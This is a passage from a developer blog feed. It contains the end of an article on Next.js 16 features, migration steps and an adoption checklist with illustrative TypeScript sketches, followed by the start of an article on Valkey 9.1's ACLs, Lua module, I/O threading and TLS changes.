&lt;p&gt;&lt;strong&gt;View Transitions&lt;/strong&gt; animate elements that update inside a Transition or navigation. &lt;strong&gt;useEffectEvent&lt;/strong&gt; extracts non-reactive logic out of Effects, easing dependency-array pain. &lt;strong&gt;Activity&lt;/strong&gt; hides UI with &lt;code&gt;display:none&lt;/code&gt; while preserving state and cleaning up Effects — the basis for the route-state preservation above.&lt;/p&gt;
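&lt;p&gt;The problem &lt;code&gt;useEffectEvent&lt;/code&gt; targets can be illustrated without React. A subscription should be set up once, yet its handler should still see the latest values. In the sketch below, a mutable &lt;code&gt;latest&lt;/code&gt; object is an assumed stand-in for that mechanism. It shows the idea only, not React's API or implementation.&lt;/p&gt;

```typescript
// Hypothetical illustration (not React): subscribe once, but let the handler read
// the latest value through a mutable holder instead of resubscribing on change.

type Listener = (message: string) => void;

const listeners: Listener[] = [];
let subscriptions = 0;

function subscribe(fn: Listener) {
  subscriptions += 1;
  listeners.push(fn);
}

function emit(message: string) {
  for (const fn of listeners) fn(message);
}

const shown: string[] = [];
const latest = { theme: "light" }; // updated on every "render"

function onMessage(message: string) {
  // Non-reactive read: theme is not a dependency of the subscription.
  shown.push(message + " [" + latest.theme + "]");
}

subscribe(onMessage);  // the "effect" runs once
emit("hi");
latest.theme = "dark"; // a re-render with a new theme
emit("bye");
console.log(subscriptions, shown.join(", ")); // 1 hi [light], bye [dark]
```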

&lt;p&gt;On top of that, &lt;strong&gt;React Compiler 1.0&lt;/strong&gt; support is stable. Automatic memoization reduces unnecessary re-renders without manual &lt;code&gt;useMemo&lt;/code&gt;/&lt;code&gt;useCallback&lt;/code&gt;. It is not enabled by default, though: the compiler relies on Babel, which can lengthen dev and build compile times, and build-performance data is still being gathered. Opt in:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// next.config.ts&lt;/span&gt;
&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;nextConfig&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="na"&gt;reactCompiler&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="c1"&gt;// stable but off by default — opt-in&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="k"&gt;default&lt;/span&gt; &lt;span class="nx"&gt;nextConfig&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;npm &lt;span class="nb"&gt;install &lt;/span&gt;babel-plugin-react-compiler@latest
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
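&lt;p&gt;What automatic memoization saves can be shown with a hand-rolled memo slot. The slot recomputes a derived value only when an input changes by reference (&lt;code&gt;Object.is&lt;/code&gt;). &lt;code&gt;createMemoSlot&lt;/code&gt; and &lt;code&gt;ProductList&lt;/code&gt; are hypothetical. The React Compiler emits its own caching code, which this sketch only approximates in spirit.&lt;/p&gt;

```typescript
// Hypothetical memo slot: recompute a derived value only when an input changes
// by reference (Object.is), roughly what a hand-written useMemo does.
// Not the React Compiler's actual output.

function sameDeps(prev: unknown[] | null, next: unknown[]): boolean {
  if (prev === null) return false;
  const before: unknown[] = prev;
  if (before.length !== next.length) return false;
  return next.every((dep, i) => Object.is(dep, before[i]));
}

function createMemoSlot() {
  let lastDeps: unknown[] | null = null;
  let lastValue: unknown = undefined;
  return (compute: () => unknown, deps: unknown[]) => {
    if (!sameDeps(lastDeps, deps)) {
      lastValue = compute(); // inputs changed: recompute
      lastDeps = deps;
    }
    return lastValue;        // otherwise reuse the previous result
  };
}

let renders = 0;
let computations = 0;
const slot = createMemoSlot();

function ProductList(items: string[], filter: string) {
  renders += 1;
  return slot(() => {
    computations += 1;
    return items.filter((item) => item.indexOf(filter) !== -1);
  }, [items, filter]);
}

const items = ["apple", "apricot", "banana"];
ProductList(items, "ap");
ProductList(items, "ap");  // same references: cached result reused
ProductList(items, "ban"); // filter changed: recomputed
console.log(renders, computations); // 3 2
```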



&lt;h2&gt;
  
  
  7. Routing &amp;amp; navigation overhaul — layout dedup + incremental prefetch
&lt;/h2&gt;

&lt;p&gt;Next.js 16 rewrote routing and navigation. Two improvements take effect with no code changes.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Layout deduplication&lt;/strong&gt;: when prefetching multiple URLs sharing a layout, the layout downloads once instead of per link. A page with 50 product links downloads the shared layout once, not 50 times, slashing transfer size.&lt;/p&gt;
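&lt;p&gt;A back-of-the-envelope calculation makes the deduplication saving concrete. The payload sizes are made-up assumptions, not measurements. Only the 50-link scenario comes from the text.&lt;/p&gt;

```typescript
// Back-of-the-envelope model of layout deduplication.
// Payload sizes are made-up assumptions for illustration, not measurements.

const links = 50;    // product links on the page (from the text)
const layoutKB = 40; // assumed size of the shared layout payload
const pageKB = 8;    // assumed size of each page-specific payload

const withoutDedup = links * (layoutKB + pageKB); // layout fetched once per link
const withDedup = layoutKB + links * pageKB;      // layout fetched once in total
const savedPct = Math.round((1 - withDedup / withoutDedup) * 100);

console.log(withoutDedup, withDedup, savedPct + "%"); // 2400 440 82%
```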

&lt;p&gt;&lt;strong&gt;Incremental prefetching&lt;/strong&gt;: only the parts not already cached are prefetched, not whole pages. The prefetch cache cancels requests when a link leaves the viewport, prioritizes on hover/re-entry, and re-prefetches when data is invalidated. You may see more individual requests but far lower total transfer — the right trade-off for nearly all apps.&lt;/p&gt;
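&lt;p&gt;The prefetch behaviors listed above can be modeled as a simple queue: skip cached parts, cancel when a link leaves the viewport, prioritize on hover, and re-fetch after invalidation. Everything in the sketch, including the segment names, is a hypothetical illustration rather than Next.js router internals.&lt;/p&gt;

```typescript
// Hypothetical model of incremental prefetching (not Next.js router internals).

const segmentCache = new Set(["layout:/shop"]); // segments already cached
let queue: string[] = [];                       // pending segment fetches

function segmentsFor(href: string): string[] {
  return ["layout:/shop", "page:" + href]; // shared layout + page-specific segment
}

function onEnterViewport(href: string) {
  for (const seg of segmentsFor(href)) {
    // Only request what is neither cached nor already queued.
    if (!segmentCache.has(seg)) {
      if (queue.indexOf(seg) === -1) queue.push(seg);
    }
  }
}

function onLeaveViewport(href: string) {
  queue = queue.filter((seg) => seg !== "page:" + href); // cancel pending request
}

function onHover(href: string) {
  const seg = "page:" + href;
  if (queue.indexOf(seg) !== -1) {
    queue = [seg, ...queue.filter((s) => s !== seg)]; // move to the front
  }
}

function flush() {
  for (const seg of queue) segmentCache.add(seg); // pretend the fetches completed
  queue = [];
}

function onInvalidate(seg: string) {
  segmentCache.delete(seg);                       // data changed: drop it...
  if (queue.indexOf(seg) === -1) queue.push(seg); // ...and prefetch it again
}

onEnterViewport("/shop/a");
onEnterViewport("/shop/b");
onEnterViewport("/shop/c");
onLeaveViewport("/shop/b");
onHover("/shop/c");
console.log(queue.join(" ")); // page:/shop/c page:/shop/a
```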

&lt;h2&gt;
  
  
  8. 16.1 &amp;amp; 16.2 — toward an AI-native framework
&lt;/h2&gt;

&lt;p&gt;16.1 refined Cache Components and polished caching APIs and DX. Then &lt;strong&gt;16.2&lt;/strong&gt; (March 18, 2026) made the direction explicit — &lt;em&gt;"make the framework itself easy for AI coding agents to operate."&lt;/em&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;16.2 feature&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;th&gt;Effect&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;AGENTS.md by default&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;create-next-app&lt;/code&gt; ships version-matched docs to agents&lt;/td&gt;
&lt;td&gt;100% internal eval pass (vs 79% skill-based)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Browser log forwarding&lt;/td&gt;
&lt;td&gt;Client errors forwarded to the dev terminal by default&lt;/td&gt;
&lt;td&gt;See client errors without switching to the console&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Agent DevTools (experimental)&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;next-browser&lt;/code&gt; CLI exposes screenshots, network, console, component tree&lt;/td&gt;
&lt;td&gt;LLM parses CLI output instead of a panel&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Performance&lt;/td&gt;
&lt;td&gt;~87% faster dev startup vs 16.1&lt;/td&gt;
&lt;td&gt;Default app&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Browser log forwarding level is configurable:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// next.config.ts&lt;/span&gt;
&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;nextConfig&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="na"&gt;logging&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;// 'error' (default) | 'warn' | 'verbose' | false&lt;/span&gt;
    &lt;span class="na"&gt;browserToTerminal&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;warn&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="p"&gt;},&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="k"&gt;default&lt;/span&gt; &lt;span class="nx"&gt;nextConfig&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
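&lt;p&gt;The forwarding level acts as a severity threshold. The minimal sketch of that filter below makes two assumptions: the setting values are the ones shown in the config comment, and &lt;code&gt;'verbose'&lt;/code&gt; forwards every browser log level. &lt;code&gt;shouldForward&lt;/code&gt; and the severity ranking are illustrative, not taken from the Next.js source.&lt;/p&gt;

```typescript
// Hypothetical level filter for forwarded browser logs.
// Assumes the setting values from the config comment; the ranking and the
// idea that "verbose" forwards everything are illustrative assumptions.

type BrowserLevel = "error" | "warn" | "info" | "log" | "debug";
type ForwardSetting = "error" | "warn" | "verbose" | false;

const severity = { error: 3, warn: 2, info: 1, log: 1, debug: 0 };
const threshold = { error: 3, warn: 2, verbose: 0 };

function shouldForward(level: BrowserLevel, setting: ForwardSetting): boolean {
  if (setting === false) return false; // forwarding disabled
  return severity[level] >= threshold[setting];
}

const messages: [BrowserLevel, string][] = [
  ["error", "Hydration failed"],
  ["warn", "Deprecated prop"],
  ["log", "render"],
];

// With 'warn', only the error and the warning reach the terminal.
for (const [level, text] of messages) {
  if (shouldForward(level, "warn")) console.log("[browser " + level + "] " + text);
}
```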



&lt;p&gt;The key insight: an LLM can't "read" a DevTools panel, but it can parse the text output of &lt;code&gt;next-browser tree&lt;/code&gt;. Each command is a one-shot request against a persistent browser session, so agents can query the app repeatedly without managing browser state — which dovetails neatly with our CLAUDE.md token-optimization principles (structured input, result caching).&lt;/p&gt;

&lt;h2&gt;
  
  
  9. Migration decisions — breaking changes and flow
&lt;/h2&gt;

&lt;p&gt;As a major release, 16 carries non-trivial compatibility changes. The most important:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Area&lt;/th&gt;
&lt;th&gt;Change&lt;/th&gt;
&lt;th&gt;Action&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Runtime&lt;/td&gt;
&lt;td&gt;Node.js 20.9+ / TypeScript 5.1+ required&lt;/td&gt;
&lt;td&gt;Node 18 dropped — upgrade runtime first&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Bundler&lt;/td&gt;
&lt;td&gt;Turbopack default&lt;/td&gt;
&lt;td&gt;Custom Webpack opts out via &lt;code&gt;--webpack&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Middleware&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;middleware.ts&lt;/code&gt; deprecated&lt;/td&gt;
&lt;td&gt;Rename to &lt;code&gt;proxy.ts&lt;/code&gt; + function name &lt;code&gt;proxy&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cache&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;revalidateTag&lt;/code&gt; signature change&lt;/td&gt;
&lt;td&gt;Add second arg: a &lt;code&gt;cacheLife&lt;/code&gt; profile&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Lint&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;next lint&lt;/code&gt; removed&lt;/td&gt;
&lt;td&gt;Use Biome/ESLint directly — codemod provided&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Images&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;images.qualities&lt;/code&gt; default &lt;code&gt;[75]&lt;/code&gt;, &lt;code&gt;minimumCacheTTL&lt;/code&gt; default 4 hours (14400 s, previously 60 s)&lt;/td&gt;
&lt;td&gt;Re-verify quality/cache policy&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Parallel routes&lt;/td&gt;
&lt;td&gt;Every slot requires &lt;code&gt;default.js&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Build fails without it; add one that calls &lt;code&gt;notFound()&lt;/code&gt; or returns &lt;code&gt;null&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AMP&lt;/td&gt;
&lt;td&gt;Removed entirely&lt;/td&gt;
&lt;td&gt;All AMP APIs (&lt;code&gt;useAmp&lt;/code&gt;, etc.) deleted&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
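&lt;p&gt;Since the runtime is the first gate, a CI pre-flight check can compare the installed Node.js version against the 20.9 minimum before the codemod runs. The helpers below are hypothetical. In a real script you would pass in &lt;code&gt;process.versions.node&lt;/code&gt;.&lt;/p&gt;

```typescript
// Hypothetical pre-flight check: does a Node.js version meet the 20.9.0 floor?
// In a real script, pass process.versions.node as `current`.

function parseVersion(v: string): number[] {
  return v.replace(/^v/, "").split(".").map((part) => parseInt(part, 10) || 0);
}

function meetsMinimum(current: string, minimum: string): boolean {
  const a = parseVersion(current);
  const b = parseVersion(minimum);
  for (const i of [0, 1, 2]) {
    const x = a[i] || 0; // missing parts count as 0
    const y = b[i] || 0;
    if (x !== y) return x > y;
  }
  return true; // equal versions meet the minimum
}

for (const v of ["18.20.4", "20.8.1", "20.9.0", "v22.3.0"]) {
  console.log(v, meetsMinimum(v, "20.9.0") ? "ok" : "upgrade runtime first");
}
```

&lt;p&gt;The same comparison works for the TypeScript 5.1 floor. For example, &lt;code&gt;meetsMinimum("5.0.4", "5.1.0")&lt;/code&gt; returns &lt;code&gt;false&lt;/code&gt;.&lt;/p&gt;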

&lt;p&gt;Below is the upgrade decision flow our team uses.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;flowchart TD
    A[Next.js 15 service] --&amp;gt; B{Node 20.9+/TS 5.1+?}
    B --&amp;gt;|No| C[Upgrade runtime first]
    C --&amp;gt; B
    B --&amp;gt;|Yes| D[codemod: npx @next/codemod upgrade latest]
    D --&amp;gt; E{Custom Webpack config?}
    E --&amp;gt;|Yes| F[Interim: keep --webpack + verify Turbopack gradually]
    E --&amp;gt;|No| G[Adopt Turbopack default]
    F --&amp;gt; H[Rename middleware.ts -&amp;gt; proxy.ts]
    G --&amp;gt; H
    H --&amp;gt; I[Add cacheLife profile to revalidateTag]
    I --&amp;gt; J{Redesign caching?}
    J --&amp;gt;|Yes| K[cacheComponents: true + adopt use cache gradually]
    J --&amp;gt;|No| L[Keep default dynamic model]
    K --&amp;gt; M[staging build/perf regression test]
    L --&amp;gt; M
    M --&amp;gt; N{Zero regressions?}
    N --&amp;gt;|No| O[Root-cause and fix]
    O --&amp;gt; M
    N --&amp;gt;|Yes| P[Gradual prod rollout + monitoring]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  10. ManoIT internal adoption checklist
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Task&lt;/th&gt;
&lt;th&gt;Owner&lt;/th&gt;
&lt;th&gt;Done criteria&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Runtime audit — find Node 18 services, upgrade to 20.9+&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;All services Node 20.9+/TS 5.1+&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Apply codemod on dev branch, confirm build passes&lt;/td&gt;
&lt;td&gt;Frontend&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;next build&lt;/code&gt; succeeds&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Bulk-rename &lt;code&gt;middleware.ts&lt;/code&gt; → &lt;code&gt;proxy.ts&lt;/code&gt; PR&lt;/td&gt;
&lt;td&gt;Frontend&lt;/td&gt;
&lt;td&gt;auth/redirect e2e passes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Add &lt;code&gt;cacheLife&lt;/code&gt; profiles to &lt;code&gt;revalidateTag&lt;/code&gt; callsites&lt;/td&gt;
&lt;td&gt;Service owners&lt;/td&gt;
&lt;td&gt;Zero deprecation warnings&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Check parallel-route slots for missing &lt;code&gt;default.js&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Frontend&lt;/td&gt;
&lt;td&gt;Zero build errors&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Review image policy — &lt;code&gt;qualities&lt;/code&gt;/&lt;code&gt;minimumCacheTTL&lt;/code&gt; regressions&lt;/td&gt;
&lt;td&gt;Frontend&lt;/td&gt;
&lt;td&gt;Zero visual regressions on key screens&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;Baseline Turbopack build time &amp;amp; bundle size&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;Before/after build-time report&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;Caching-redesign PoC — &lt;code&gt;cacheComponents&lt;/code&gt; + &lt;code&gt;use cache&lt;/code&gt; on key pages&lt;/td&gt;
&lt;td&gt;Frontend lead&lt;/td&gt;
&lt;td&gt;TTFB / cache hit-rate measured&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;React Compiler opt-in A/B — build time vs runtime re-renders&lt;/td&gt;
&lt;td&gt;Frontend&lt;/td&gt;
&lt;td&gt;Adoption decision doc&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;td&gt;Standardize 16.2 AGENTS.md + browser log forwarding&lt;/td&gt;
&lt;td&gt;DX&lt;/td&gt;
&lt;td&gt;Reflected in new-repo template&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;staging load/perf regression test (Lighthouse, k6)&lt;/td&gt;
&lt;td&gt;QA&lt;/td&gt;
&lt;td&gt;Zero Core Web Vitals regression&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;12&lt;/td&gt;
&lt;td&gt;Gradual prod rollout (canary → all) + rollback rehearsal&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;Zero-downtime deploy + rollback verified&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  11. Conclusion — a major release that delivers "predictable caching and fast defaults"
&lt;/h2&gt;

&lt;p&gt;In one line, Next.js 16 is &lt;strong&gt;"the release that strips away implicit magic — making caching explicit, the bundler fast, and middleware honest."&lt;/strong&gt; Cache Components and &lt;code&gt;use cache&lt;/code&gt; turn caching, once a debugging black box, into an opt-in model where the compiler manages keys. Making Turbopack the default brings build and Fast Refresh acceleration to everyone as a zero-config default. Renaming to &lt;code&gt;proxy.ts&lt;/code&gt; looks small but fixes the mental model that "this file is the network boundary in front of the cache," and the &lt;code&gt;revalidateTag&lt;/code&gt;/&lt;code&gt;updateTag&lt;/code&gt;/&lt;code&gt;refresh&lt;/code&gt; split cleanly separates SWR, read-your-writes, and uncached-refresh intents. 16.2's AI-native turn signals that the framework now treats coding agents as first-class users alongside humans.&lt;/p&gt;

&lt;p&gt;Three things to remember operationally. (1) &lt;strong&gt;Upgrade the runtime first&lt;/strong&gt; — with Node 18 dropped, the runtime is always the first gate of a 16 upgrade. (2) &lt;strong&gt;Treat caching redesign as a separate milestone&lt;/strong&gt; — a plain migration (keeping the default dynamic model) and adopting &lt;code&gt;cacheComponents&lt;/code&gt; are different jobs; don't mix them in one PR. (3) &lt;strong&gt;Measure build-output regressions for the Turbopack switch&lt;/strong&gt; — most things are compatible, but builds depending on custom Webpack plugins should keep a &lt;code&gt;--webpack&lt;/code&gt; safety net and verify gradually during the transition. The shortest one-line recommendation: &lt;em&gt;"This sprint, run the codemod on a dev branch to get the build passing, then merge the proxy.ts rename and the revalidateTag profile additions first."&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;ⓘ This article was researched and written by ManoIT's automated blogging pipeline (Claude Opus 4.6 + Cowork Agent), analyzing the official Next.js 16 release blog (nextjs.org/blog/next-16, Oct 21 2025), the Next.js 16.2 AI Improvements blog (Mar 18 2026), the Next.js 16 upgrade guide, InfoQ's 16 release analysis, and LogRocket's 16 review as primary sources. API signatures, config options, performance figures, and flag names reflect the official docs as of the publish date (2026-05-30) and may change in later patches. Always verify against nextjs.org/docs and GitHub Releases before applying in production. Internal adoption examples are adapted from ManoIT's frontend team's operational procedures.&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://www.manoit.co.kr/forum/view/1481042" rel="noopener noreferrer"&gt;ManoIT Tech Blog&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>nextjs</category>
      <category>react</category>
      <category>webdev</category>
      <category>javascript</category>
    </item>
    <item>
      <title>Valkey 9.1 Deep Dive — Database-Level ACLs, Lua-as-a-Module, and a New I/O Threading Model Hitting 2.1M RPS</title>
      <dc:creator>daniel jeong</dc:creator>
      <pubDate>Fri, 29 May 2026 00:27:18 +0000</pubDate>
      <link>https://dev.to/x4nent/valkey-91-deep-dive-database-level-acls-lua-as-a-module-and-a-new-io-threading-model-hitting-5an</link>
      <guid>https://dev.to/x4nent/valkey-91-deep-dive-database-level-acls-lua-as-a-module-and-a-new-io-threading-model-hitting-5an</guid>
      <description>&lt;h1&gt;
  
  
  Valkey 9.1 Deep Dive — Database-Level ACLs, Lua-as-a-Module, and a New I/O Threading Model Hitting 2.1M RPS, Plus HGETDEL/MSETEX/CLUSTERSCAN Redefining the 2026 In-Memory Datastore Operations Standard
&lt;/h1&gt;

&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Valkey 9.1.0 (May 19, 2026) is the first minor release after the 9.0 GA, with 80+ contributors hardening security, observability, performance, efficiency, and tooling all at once.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Numbered database-level ACLs&lt;/strong&gt; let you scope a user's permissions to specific databases (&lt;code&gt;db=0,1&lt;/code&gt;), making single-cluster multi-tenant isolation practical.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Lua moved to a module&lt;/strong&gt; (&lt;code&gt;libvalkeylua.so&lt;/code&gt;): pure cache workloads can leave Lua unloaded and eliminate the scripting attack surface entirely.&lt;/li&gt;
&lt;li&gt;A &lt;strong&gt;redesigned I/O threading model&lt;/strong&gt; pushes a single server to &lt;strong&gt;2.1M RPS&lt;/strong&gt; (512-byte payloads, 9 IO threads, pipeline depth 10) and gives up to 17% more throughput.&lt;/li&gt;
&lt;li&gt;New commands &lt;strong&gt;HGETDEL / MSETEX / CLUSTERSCAN&lt;/strong&gt;, &lt;strong&gt;JSON logging&lt;/strong&gt; (&lt;code&gt;log-format json&lt;/code&gt;), main/IO thread usage metrics, and &lt;strong&gt;TLS auto-reload + SAN-URI mTLS&lt;/strong&gt; round it out.&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;

&lt;p&gt;The Valkey community shipped &lt;strong&gt;Valkey 9.1.0&lt;/strong&gt; on May 19, 2026. Valkey was forked from Redis 7.2.4 under the Linux Foundation after the 2024 Redis license change (SSPL/RSALv2). With the 9.0 GA in October 2025, it went from "a Redis-compatible fork" to "a project with its own roadmap." 9.1 builds on that foundation, with 80+ contributors advancing security, observability, performance, efficiency, and tooling in parallel. In short:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Numbered database-level ACLs&lt;/strong&gt; split per-tenant permissions at db granularity inside a single instance.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Lua scripting moved into its own module&lt;/strong&gt;, so you can turn it off entirely when unused.&lt;/li&gt;
&lt;li&gt;A &lt;strong&gt;new I/O threading model&lt;/strong&gt; hit &lt;strong&gt;2.1M RPS&lt;/strong&gt; on a single server (512-byte payload, 9 IO threads, pipeline depth 10).&lt;/li&gt;
&lt;li&gt;The &lt;strong&gt;HGETDEL/MSETEX/CLUSTERSCAN&lt;/strong&gt; commands were added.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;JSON logging&lt;/strong&gt; arrived, along with main/IO thread usage metrics.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;TLS certificate auto-reload and SAN-URI mTLS&lt;/strong&gt; are now supported.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;This article explains the reasoning behind each change from an operations standpoint. It also revisits the 9.0 foundation (Atomic Slot Migration, Hash Field Expiration, cluster-mode numbered DBs) and lays out the step-by-step upgrade, validation, and rollback playbook ManoIT applied to its internal cache/session clusters.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Why May 2026's Valkey 9.1 matters
&lt;/h2&gt;

&lt;p&gt;Valkey's significance isn't a version number; it's the maturity the project has reached a little over two years after the fork. Right after the fork, the yardstick was "how Redis-compatible is it?" Then 9.0 added features &lt;em&gt;not present in Redis OSS&lt;/em&gt;: Atomic Slot Migration, Hash Field Expiration, and cluster-mode numbered DBs. From that point the yardstick became "what operational value do its own features deliver?" 9.1 continues that arc by concentrating on the two most operations-facing areas: &lt;strong&gt;security and observability&lt;/strong&gt;.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Date&lt;/th&gt;
&lt;th&gt;Release / Event&lt;/th&gt;
&lt;th&gt;Operational meaning&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;2024.03&lt;/td&gt;
&lt;td&gt;Redis license change → Valkey fork (Redis 7.2.4 base)&lt;/td&gt;
&lt;td&gt;BSD-3-Clause retained, Linux Foundation governance&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2024.09&lt;/td&gt;
&lt;td&gt;Valkey 8.0 — multithreaded I/O&lt;/td&gt;
&lt;td&gt;Per-core throughput gains begin&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2025.04&lt;/td&gt;
&lt;td&gt;Valkey 8.1: new hashtable, I/O improvements&lt;/td&gt;
&lt;td&gt;Lower per-key memory overhead, higher throughput&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2025.10.21&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Valkey 9.0 GA — Atomic Slot Migration, Hash Field Expiration, cluster numbered DBs, 1B RPS&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Inflection beyond Redis compatibility&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
